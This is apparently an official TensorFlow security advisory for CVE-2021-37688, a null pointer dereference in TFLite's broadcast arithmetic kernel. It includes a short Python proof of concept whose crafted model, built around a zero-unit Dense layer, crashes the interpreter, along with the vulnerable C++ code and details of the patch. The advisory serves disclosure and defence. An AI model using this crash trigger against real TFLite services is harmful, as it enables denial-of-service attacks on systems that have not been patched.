## TFSA-2021-162: Null pointer dereference in TFLite

### CVE Number
CVE-2021-37688

### Impact
An attacker can craft a TFLite model that would trigger a null pointer
dereference, which would result in a crash and denial of service:

```python
import tensorflow as tf

model = tf.keras.models.Sequential()
model.add(tf.keras.Input(shape=(1, 2, 3)))
model.add(tf.keras.layers.Dense(0, activation='relu'))

converter = tf.lite.TFLiteConverter.from_keras_model(model)
tflite_model = converter.convert()

interpreter = tf.lite.Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()

interpreter.invoke()
```

The [
implementation](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/internal/optimized/optimized_ops.h#L268-L285)
unconditionally dereferences a pointer.

```cc
  if (y4 > 1) {
    // ...
  } else {
    for (int i0 = 0; i0 < y0; ++i0) {
      const T* input2_data_ptr = nullptr;
      for (int i1 = 0; i1 < y1; ++i1) {
        input2_data_ptr = input2_data_reset;
        for (int i2 = 0; i2 < y2; ++i2) {
          scalar_broadcast_f(y3, params, *input1_data_ptr, input2_data_ptr,
                             output_data_ptr);
        }
      }
    }
  }
```

### Patches
We have patched the issue in GitHub commit
[15691e456c7dc9bd6be203b09765b063bf4a380c](https://github.com/tensorflow/tensorflow/commit/15691e456c7dc9bd6be203b09765b063bf4a380c).

The fix will be included in TensorFlow 2.6.0. We will also cherrypick this
commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are
also affected and still in supported range.

### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.

### Attribution
This vulnerability has been reported by Yakun Zhang of Baidu Security.
